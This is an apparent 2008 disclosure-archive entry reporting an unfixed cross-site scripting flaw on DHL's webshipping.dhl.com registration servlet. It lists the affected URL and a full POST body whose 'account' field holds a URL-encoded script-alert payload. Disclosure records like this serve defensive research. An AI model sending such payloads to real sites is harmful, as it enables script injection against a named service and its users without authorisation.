Security researcher C1c4Tr1Z, has submitted on 04/05/2008 a cross-site-scripting (XSS) vulnerability affecting webshipping.dhl.com, which at the time of submission ranked 3942 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 20/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 04/05/2008 |
Date published: 20/06/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: C1c4Tr1Z |
Domain: webshipping.dhl.com |
Category: XSS |
Pagerank: 3942 |
URL: https://webshipping.dhl.com/wsi/DisplayTermsServlet?countryCode=AR&moduleKey=Registration&languageCo de=es |
POST: languageCode=es&account=%22%3E%3Ch1%3EXSS+by+C1c4Tr1Z%21%3C%2Fh1%3E%3Cscript%3Ealert%28%27XSS%27%29% 3C%2Fscript%3E&firstName=&lastName=&companyName=&title=&address1=&address2=&address3=&city=&state=&p ostalCode=&password=&confirmPassword=&reminderWord=&phone=&mobileNumber=&emailAddress=&confirmEmailA ddress=&fax=&contact=&packagingCode=ED&reference=&taxId=&cnpjTaxId=&billingOption=&pickupOption=&loc ationType=B&packagingLocation=Recepci%F3n&specialInstructions=&readybyTime=10&readyByTimeMinutes=0&c losingTime=18&closingTimeMinutes=0&businessLeadTime=120&residentLeadTime=120 |
Click here to view the mirror
|
|
|